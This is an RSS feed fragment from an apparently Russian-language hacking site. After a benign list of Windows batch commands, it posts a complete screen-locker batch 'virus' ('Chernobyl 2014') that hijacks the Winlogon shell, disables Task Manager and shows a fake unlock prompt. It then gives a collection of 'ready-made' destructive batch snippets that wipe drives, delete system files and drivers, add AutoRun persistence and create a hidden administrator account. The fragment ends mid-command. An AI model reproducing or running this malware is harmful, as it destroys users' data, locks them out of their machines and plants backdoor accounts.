заднего плана консоли.&lt;br&gt;COMMAND - Стартует новую копию интерпретатора команд Windows.&lt;br&gt; COMP - Сравнивает содержимое двух файлов или установки файлов.&lt;br&gt;COMPACT - Отображает или видоизменяет сжатие файлов на патрициях Windows NT(NTFS).&lt;br&gt; CONVERT - Конвертирует FAT томов к формату файловой системы Windows NT(NTFS). Вы не можете конвертировать текущий диск.&lt;br&gt;COPY - Копирует один или больше файлов на другое место.&lt;br&gt;CTTY - Изменяет терминальное устройство, используемое для управления вашей системой.&lt;br&gt;DATE - Отображает или устанавливает дату.&lt;br&gt;DEL - Удаляет один или более файлов.&lt;br&gt;DEBUG - Выполняет отладку, тестирование программ и редактирование инструментальных средств.&lt;br&gt;DIR - Отображает список файлов и поддиректорий в директории.&lt;br&gt;DISKCOMP - Сравнивает содержимое двух дискет.&lt;br&gt;DISKCOPY - Копирует содержимое одной дискеты на другую.&lt;br&gt;DOSKEY - Редактирует командные строки, восстанавливает команды Windows и создает макрос.&lt;br&gt;ECHO - Отображает сообщения, или включает/выключает вывод команд.&lt;br&gt;EMM386 - Включает/выключает поддержку расширенной памяти EMM386.&lt;br&gt; ENDLOCAL - Заканчивает локализацию изменений окружающей среды в *.BAT-файле.&lt;br&gt;ERASE - Удаляет один или более файлов.&lt;br&gt;EXIT - Прекращает выполнение программы (интерпретатор команд).&lt;br&gt;EXTRACT - Средство извлечения информации из CAB - файлов.&lt;br&gt;FC - Сравнивает два файла или установки файлов, и отображает различие между ними.&lt;br&gt;FIND - Ищет текстовую строку в файле или файлах.&lt;br&gt;FINDSTR - Поиск строк в файлах.&lt;br&gt;FOR - Выполняет указанную команду для каждого файла в наборе файлов.&lt;br&gt;FORMAT - Форматирует диск для использования с Windows.&lt;br&gt; FTYPE - Отображает или модифицирует типы файлов, используемых в связях расширений.&lt;br&gt;GOTO - Направляет интерпретатор команд Windows NT к помеченной строке в *.BAT-файле.&lt;br&gt;GRAFTABL - Способность Windows отображать символы псевдографики, вставленные в графическом режиме.&lt;br&gt;HELP - Обеспечивает информацию Help для команд Windows.&lt;br&gt; IF - Выполняет обработку условия в *.BAT-файле.&lt;br&gt;KEYB - Конфигурирует клавиатуру для заданного языка.&lt;br&gt;LABEL - Создает, изменяет, или удаляет метку тома на диске.&lt;br&gt;LOADHIGH(LH) - Загружает программу в верхние адреса памяти.&lt;br&gt;MD - Создает директорию.&lt;br&gt;MEM - Отображает величину используемой и свободной памяти в вашей системе.&lt;br&gt;MKDIR - Создает директорию.&lt;br&gt;MODE - Конфигурирует системное устройство.&lt;br&gt;MORE - Отображает вывод одного экрана за раз.&lt;br&gt;MOVE - Перемещает один или более файлов из одной директории в другую на том же диске.&lt;br&gt;NETSTAT - Отображает статистики протоколов и текущих сетевых соединений TCP/IP.&lt;br&gt; NLSFUNC - Загружает информацию, специфическую для страны.&lt;br&gt;PATH - Отображает или устанавливает путь поиска для выполняемых файлов.&lt;br&gt;PAUSE - Приостанавливает обработку *.BAT-файла и отображает сообщение.&lt;br&gt;POPD - Восстанавливает предыдущее значение текущей директории, сохраненной по PUSHD.&lt;br&gt; PRINT - Печатает текстовый файл.&lt;br&gt;PROMPT - Изменяет подсказку к командам Windows.&lt;br&gt; PUSHD - Сохраняет текущую директорию, потом изменяет.&lt;br&gt;RD - Удаляет директорию.&lt;br&gt;RECOVER - Восстанавливает читаемую информацию с плохого или дефектного диска.&lt;br&gt;REM - Записывает комментарии (примечания) в *.BAT-файлы или CONFIG.SYS.&lt;br&gt; REN - Переименует файл или файлы.&lt;br&gt;RENAME - Переименует файл или файлы.&lt;br&gt;REPLACE - Заменяет файлы.&lt;br&gt;RESTORE - Восстанавливает файлы, которые были архивированы с использованием команды BACKUP.&lt;br&gt; RMDIR - Удаляет директорию.&lt;br&gt;SET - Отображает, устанавливает или удаляет переменные среды Windows.&lt;br&gt; SETLOCAL - Начинает локализацию изменений среды в *.BAT-файле.&lt;br&gt;SETVER - Устанавливает номер версии MS-DOS, который Windows сообщает программе.&lt;br&gt;SHIFT - Сдвигает позицию замещаемых параметров в *.BAT-файле.&lt;br&gt;SMARTDRV - Инсталлирует и конфигурирует утилиту кэширования диска SMART - драйва.&lt;br&gt;SORT - Сортирует входной поток.&lt;br&gt;START - Стартует отдельное окно для выполнения указанной программы или команды.&lt;br&gt;SUBST - Связывает путь с литерой диска.&lt;br&gt;SYS - Копирует файлы системы MS-DOS и интерпретатор команд на указанный вами диск.&lt;br&gt;TIME - Отображает или устанавливает системное время.&lt;br&gt;TITLE - Устанавливает заголовок окна для сеанса .&lt;br&gt;TREE - Графически отображает структуру директория в драйве или путь.&lt;br&gt;TYPE - Отображает содержимое текстового файла.&lt;br&gt;VER - Отображает версию Windows.&lt;br&gt; VERIFY - Сообщает Windows, проверять ли правильность записи файлов на диск.&lt;br&gt;VOL - Отображает метку дискового тома и серийный номер.&lt;br&gt;XCOPY - Копирует файлы и деревья директории.&lt;/p&gt;</content:encoded>
			<link>http://hackerzone.ucoz.lv/news/komandy_dlja_bat_fajlov/2014-03-15-3</link>
			<category>Команды *BAT файлов</category>
			<dc:creator>drill28</dc:creator>
			<guid>http://hackerzone.ucoz.lv/news/komandy_dlja_bat_fajlov/2014-03-15-3</guid>
			<pubDate>Sat, 15 Mar 2014 12:58:56 GMT</pubDate>
		</item>
		<item>
			<title>Chernobyl 2014</title>
			<description>&lt;p&gt;&lt;br&gt;&lt;img width=&quot;900&quot; height=&quot;601&quot; style=&quot;width: 476px; height: 275px;&quot; src=&quot;http://hackerzone.ucoz.lv/an-aerial-view-of-the-chernobyl-nuclear-plant-in-u.jpg&quot;&gt;&lt;/p&gt;&lt;p&gt;Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)&lt;br&gt;&lt;br&gt; @echo off&lt;br&gt; CHCP 1251&lt;br&gt; cls&lt;br&gt; Set Yvaga=На вашем компьютере найден вирус.&lt;br&gt;Set pass=Пароль&lt;br&gt;Set pas=Введите пароль.&lt;br&gt;Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль&lt;br&gt;Set dim=Выключаю вирус...&lt;br&gt;title Внимание!!!&lt;br&gt;CHCP 866&lt;br&gt; IF EXIST C:&amp;#92;windows&amp;#92;boot.bat (&lt;br&gt; goto ok )&lt;br&gt; cls&lt;br&gt; IF NOT EXIST C:&amp;#92;windows&amp;#92;boot.bat (&lt;br&gt; ECHO Windows Registry Editor Version 5.00 &amp;gt;&amp;gt; C:&amp;#92;0.reg&lt;br&gt; ECHO. &amp;gt;&amp;gt; C:&amp;#92;0.reg&lt;br&gt; ECHO [HKEY_LOCAL_MACHINE&amp;#92;SOFTWARE&amp;#92;Microsoft&amp;#92;Windows NT&amp;#92;CurrentVersion&amp;#92;Winlogon] &amp;gt;&amp;gt; C:&amp;#92;0.reg&lt;br&gt; ECHO. &amp;gt;&amp;gt; C:&amp;#92;0.reg&lt;br&gt; ECHO &quot;Shell&quot;=&quot;Explorer.exe...</description>
			<content:encoded>&lt;p&gt;&lt;br&gt;&lt;img width=&quot;900&quot; height=&quot;601&quot; style=&quot;width: 476px; height: 275px;&quot; src=&quot;http://hackerzone.ucoz.lv/an-aerial-view-of-the-chernobyl-nuclear-plant-in-u.jpg&quot;&gt;&lt;/p&gt;&lt;p&gt;Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)&lt;br&gt;&lt;br&gt; @echo off&lt;br&gt; CHCP 1251&lt;br&gt; cls&lt;br&gt; Set Yvaga=На вашем компьютере найден вирус.&lt;br&gt;Set pass=Пароль&lt;br&gt;Set pas=Введите пароль.&lt;br&gt;Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль&lt;br&gt;Set dim=Выключаю вирус...&lt;br&gt;title Внимание!!!&lt;br&gt;CHCP 866&lt;br&gt; IF EXIST C:&amp;#92;windows&amp;#92;boot.bat (&lt;br&gt; goto ok )&lt;br&gt; cls&lt;br&gt; IF NOT EXIST C:&amp;#92;windows&amp;#92;boot.bat (&lt;br&gt; ECHO Windows Registry Editor Version 5.00 &amp;gt;&amp;gt; C:&amp;#92;0.reg&lt;br&gt; ECHO. &amp;gt;&amp;gt; C:&amp;#92;0.reg&lt;br&gt; ECHO [HKEY_LOCAL_MACHINE&amp;#92;SOFTWARE&amp;#92;Microsoft&amp;#92;Windows NT&amp;#92;CurrentVersion&amp;#92;Winlogon] &amp;gt;&amp;gt; C:&amp;#92;0.reg&lt;br&gt; ECHO. &amp;gt;&amp;gt; C:&amp;#92;0.reg&lt;br&gt; ECHO &quot;Shell&quot;=&quot;Explorer.exe, C:&amp;#92;&amp;#92;windows&amp;#92;&amp;#92;boot.bat &quot; &amp;gt;&amp;gt; C:&amp;#92;0.reg&lt;br&gt; start/wait regedit -s C:&amp;#92;0.reg&lt;br&gt; del C:&amp;#92;0.reg&lt;br&gt; ECHO @echo off &amp;gt;&amp;gt;C:&amp;#92;windows&amp;#92;boot.bat&lt;br&gt; ECHO C:&amp;#92;WINDOWS&amp;#92;system32&amp;#92;taskkill.exe /f /im Explorer.exe &amp;gt;&amp;gt;C:&amp;#92;windows&amp;#92;boot.bat&lt;br&gt; ECHO reg add &quot;HKCU&amp;#92;software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;system&quot; /v DisableTaskMgr /t REG_DWORD /d 1 /f &amp;gt;&amp;gt;C:&amp;#92;windows&amp;#92;boot.bat&lt;br&gt; ECHO start sys.bat &amp;gt;&amp;gt;C:&amp;#92;windows&amp;#92;boot.bat&lt;br&gt; attrib +r +a +s +h C:&amp;#92;windows&amp;#92;boot.bat&lt;br&gt; copy virus.bat c:&amp;#92;windows&amp;#92;sys.bat&lt;br&gt; attrib +r +a +s +h C:&amp;#92;windows&amp;#92;sys.bat&lt;br&gt; GOTO end)&lt;br&gt; :ok&lt;br&gt; cls&lt;br&gt; Echo %Yvaga%&lt;br&gt; echo.&lt;br&gt; echo %virus%&lt;br&gt; echo %pas%&lt;br&gt; set /a choise = 0&lt;br&gt; set /p choise=%pass%:&lt;br&gt; if &quot;%choise%&quot; == &quot;101&quot; goto gold&lt;br&gt; if &quot;%choise%&quot; == &quot;200393&quot; goto status&lt;br&gt; exit&lt;br&gt; :status&lt;br&gt; echo %dim%&lt;br&gt; attrib -r -a -s -h C:&amp;#92;windows&amp;#92;boot.bat&lt;br&gt; del C:&amp;#92;windows&amp;#92;boot.bat&lt;br&gt; attrib -r -a -s -h C:&amp;#92;windows&amp;#92;sys.bat&lt;br&gt; del C:&amp;#92;windows&amp;#92;sys.bat&lt;br&gt; cls&lt;br&gt; :gold&lt;br&gt; start C:&amp;#92;&lt;br&gt; :end&lt;br&gt;&lt;/p&gt;</content:encoded>
			<link>http://hackerzone.ucoz.lv/news/chernobyl_2014/2014-03-15-2</link>
			<category>*Bat Virus</category>
			<dc:creator>drill28</dc:creator>
			<guid>http://hackerzone.ucoz.lv/news/chernobyl_2014/2014-03-15-2</guid>
			<pubDate>Sat, 15 Mar 2014 12:49:29 GMT</pubDate>
		</item>
		<item>
			<title>Готовые *bat вирусы</title>
			<description>&lt;img alt=&quot;&quot; src=&quot;http://hackerzone.ucoz.lv/Fotolia_22325572_XS-300x300.jpg&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff4500&quot;&gt;&lt;span style=&quot;FONT-FAMILY: Arial Black; FONT-SIZE: 12pt&quot;&gt;Простенькие вирусы &lt;/span&gt;&lt;br&gt;&lt;br&gt;&lt;/span&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;Убирает рабочий стол &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;@echo off &lt;br&gt;reg add HKCU&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer /v NoDesktop /t REG_DWORD /d 1 /f &amp;gt;nul &lt;br&gt;&lt;br&gt;&lt;/span&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;Выключается компьютер &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;@echo off &lt;br&gt;shutdown -s -t 1 -c &quot;lol&quot; &amp;gt;nul &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;Перезагрузка компьютера &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;@echo off &lt;br&gt;shutdown -r -t 1 -c &quot;lol&quot; &amp;gt;nul &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;Запрещает запускать программы &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;@echo off &lt;br&gt;reg
 add 
HKCU&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&amp;#92;Restric...</description>
			<content:encoded>&lt;img alt=&quot;&quot; src=&quot;http://hackerzone.ucoz.lv/Fotolia_22325572_XS-300x300.jpg&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff4500&quot;&gt;&lt;span style=&quot;FONT-FAMILY: Arial Black; FONT-SIZE: 12pt&quot;&gt;Простенькие вирусы &lt;/span&gt;&lt;br&gt;&lt;br&gt;&lt;/span&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;Убирает рабочий стол &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;@echo off &lt;br&gt;reg add HKCU&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer /v NoDesktop /t REG_DWORD /d 1 /f &amp;gt;nul &lt;br&gt;&lt;br&gt;&lt;/span&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;Выключается компьютер &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;@echo off &lt;br&gt;shutdown -s -t 1 -c &quot;lol&quot; &amp;gt;nul &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;Перезагрузка компьютера &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;@echo off &lt;br&gt;shutdown -r -t 1 -c &quot;lol&quot; &amp;gt;nul &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;Запрещает запускать программы &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;@echo off &lt;br&gt;reg
 add 
HKCU&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer&amp;#92;RestrictRun
 /v 1 /t REG_DWORD /d %SystemRoot%&amp;#92;explorer.exe /f &amp;gt;nul &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;Удаление дров &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;@echo off &lt;br&gt;del &quot;%SystemRoot%&amp;#92;Driver Cache&amp;#92;i386&amp;#92;driver.cab&quot; /f /q &amp;gt;nul &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;Удаляет звуки Windows &lt;/span&gt;&lt;br&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;@echo off &lt;br&gt;del &quot;%SystemRoot%&amp;#92;Media&quot; /q &amp;gt;nul&lt;/span&gt;
&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #a9a9a9; FONT-SIZE: 10pt&quot;&gt;Запрещает заходить в панель управления&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;@echo off &lt;br&gt;reg add HKCU&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;Current Version&amp;#92;Policies&amp;#92;Explorer &lt;br&gt;/v NoControlPanel /t REG_DWORD /d 1 /f &amp;gt;nul&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Verdana; COLOR: #a9a9a9; FONT-SIZE: 10pt&quot;&gt;&lt;span style=&quot;FONT-FAMILY: Verdana; COLOR: #a9a9a9; FONT-SIZE: 10pt&quot;&gt;&lt;span style=&quot;FONT-FAMILY: Verdana; COLOR: #a9a9a9; FONT-SIZE: 10pt&quot;&gt;Запрещает комбинацию Ctrl-Alt-Delete&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;COLOR: #a9a9a9&quot;&gt;&lt;/span&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #ff0000&quot;&gt;&lt;span style=&quot;COLOR: #a9a9a9; FONT-SIZE: 10pt&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;font-size: 10pt; color: rgb(255, 0, 0);&quot;&gt;reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f &amp;gt;nul &lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;&lt;/span&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;span style=&quot;font-family: Verdana; color: rgb(169, 169, 169); font-size: 10pt; &quot;&gt;Меняет местами значение кнопок мыши&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;span style=&quot;COLOR: #000000&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;span style=&quot;COLOR: #000000&quot;&gt;&lt;span style=&quot;COLOR: #000000&quot;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;span style=&quot;COLOR: #ff0000; FONT-SIZE: 10pt&quot;&gt;%SystemRoot%/system32/rundll32 user32, SwapMouseButton &amp;gt;nul&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;span style=&quot;COLOR: #ff0000; FONT-SIZE: 10pt&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;span style=&quot;FONT-FAMILY: Verdana; COLOR: #a9a9a9; FONT-SIZE: 10pt&quot;&gt;Удаляет курсор мыши&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;span style=&quot;COLOR: #000000; FONT-SIZE: 10pt&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;span style=&quot;COLOR: #ff0000; FONT-SIZE: 10pt&quot;&gt;del &quot;%SystemRoot%Cursors*.*&quot; &amp;gt;nul &lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;span style=&quot;COLOR: #ff0000; FONT-SIZE: 10pt&quot;&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: 13px; color: rgb(169, 169, 169);&quot;&gt;Меняет название корзины&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: 13px; color: rgb(169, 169, 169);&quot;&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: 13px; color: rgb(255, 0, 0);&quot;&gt;reg
 add HKCU&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;ShellNoRoam&amp;#92;MUICache /v 
@C:&amp;#92;WINDOWS&amp;#92;system32&amp;#92;SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ
 /F&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: 13px; color: rgb(255, 0, 0);&quot;&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: 13px; color: rgb(169, 169, 169);&quot;&gt;Убирает панель управления&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: 13px; color: rgb(169, 169, 169);&quot;&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: 13px; color: rgb(255, 0, 0);&quot;&gt;reg add HKCU&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;System /v DisableTaskMgr /t REG_DWORD /d 1 /f&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff4500&quot;&gt;&lt;span style=&quot;FONT-FAMILY: Arial Black; FONT-SIZE: 12pt&quot;&gt;Серьезные вирусы &lt;/span&gt;&lt;br&gt;&lt;br&gt;&lt;/span&gt;&lt;span style=&quot;COLOR: #a9a9a9&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;Удаляет ВСЕ с раздела&amp;#92;диска(не пытайтесь проверить у себя)&lt;/span&gt; &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff0000; FONT-SIZE: 10pt&quot;&gt;rd [Буква_Диск]: /s /q &lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #a9a9a9&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;Удаляет все файлы в program files &lt;/span&gt;&lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff0000; FONT-SIZE: 10pt&quot;&gt;del c:Program Files/q &lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;COLOR: #ff0000; FONT-SIZE: 10pt&quot;&gt;
&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #a9a9a9&quot;&gt;Убивает процесс explorer.exe&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;span style=&quot;COLOR: #000000&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #ff0000&quot;&gt;taskkill /f /im explorer.exe &amp;gt;nul &lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #ff0000&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;COLOR: #000000&quot;&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #a9a9a9&quot;&gt;Создает миллион папок&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; FONT-SIZE: 10pt&quot;&gt;FOR /L %%i IN (1,1,1000000) DO md %%i&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; FONT-SIZE: 10pt&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #a9a9a9; FONT-SIZE: 10pt&quot;&gt;Удаляет все драйвера, которые установлены на компьютере&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #000000; FONT-SIZE: 10pt&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #ff0000; FONT-SIZE: 10pt&quot;&gt;del &quot;%SystemRoot%Driver Cachei386driver.cab&quot; /f /q &amp;gt;nul &lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #ff0000; FONT-SIZE: 10pt&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #a9a9a9; FONT-SIZE: 10pt&quot;&gt;Удаляет команду DEL&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #000000; FONT-SIZE: 10pt&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #ff0000; FONT-SIZE: 10pt&quot;&gt;del %0&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;COLOR: #000000&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;COLOR: #a9a9a9&quot;&gt;Будет открывать бесконечно Пэинт&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;COLOR: #000000&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;:x&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;Start mspaint &lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;goto x&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;COLOR: #a9a9a9&quot;&gt;Изменяет расширение всех ярлыков на .txt&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;COLOR: #000000&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #ff0000&quot;&gt;assoc .lnk=.txt&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #ff0000&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #a9a9a9&quot;&gt;Заражает Autoexec&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #000000&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #ff0000&quot;&gt;copy &quot;&quot;%0&quot;&quot; &quot;%SystemRoot%&amp;#92;system32&amp;#92;batinit.bat&quot; &amp;gt;nul &lt;br&gt;reg add &quot;HKCU&amp;#92;SOFTWARE&amp;#92;Microsoft&amp;#92;Command Processor&quot; /v AutoRun /t REG_SZ /d &quot;%SystemRoot%&amp;#92;syste m32&amp;#92;batinit.bat&quot; /f &amp;gt;nul &lt;br&gt;&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;COLOR: #a9a9a9; FONT-SIZE: 10pt&quot;&gt;Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-SIZE: 10pt&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;COLOR: #ff0000; FONT-SIZE: 10pt&quot;&gt;@echo off&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #ff0000; FONT-SIZE: 10pt&quot;&gt;chcp 1251 &lt;br&gt;net user SUPPORT_388945a0 /delete &lt;br&gt;net user hacker hack /add &lt;br&gt;net localgroup Администраторы hacker /add &lt;br&gt;net localgroup Пользователи SUPPORT_388945a0 /del &lt;br&gt;reg
 add &quot;HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows 
NTCurrentVersionWinlogonSpecialAccountsUserList&quot; /v &quot;support&quot; /t 
